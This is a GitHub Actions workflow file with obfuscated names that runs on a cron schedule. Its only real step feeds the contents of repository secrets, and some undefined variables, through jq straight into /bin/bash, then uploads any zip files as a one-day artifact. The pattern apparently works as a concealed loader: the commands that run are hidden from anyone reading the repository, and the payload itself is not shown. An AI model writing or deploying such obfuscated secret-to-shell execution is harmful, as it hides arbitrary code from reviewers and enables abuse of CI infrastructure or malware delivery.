name: zhaihengchenfu
on:
  workflow_dispatch:

  schedule:
    - cron: '4 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaihengchenfu
        env:
          tse3: ${{ secrets.tse3 }}
        run: |
          printf '%s' "$tse3" | jq -r .px18 | /bin/bash
          echo $wy54013 | jq -r .kli09 | /bin/bash
          echo $tqcjr3 | jq -r .uj6 | /bin/bash
          printf '%s' "$i0043" | jq -r .xjr571 | /bin/bash
          printf '%s' "$zcccr08642" | jq -r .xc35897 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: vMuO9C7F
          path: "*.zip"
          retention-days: 1
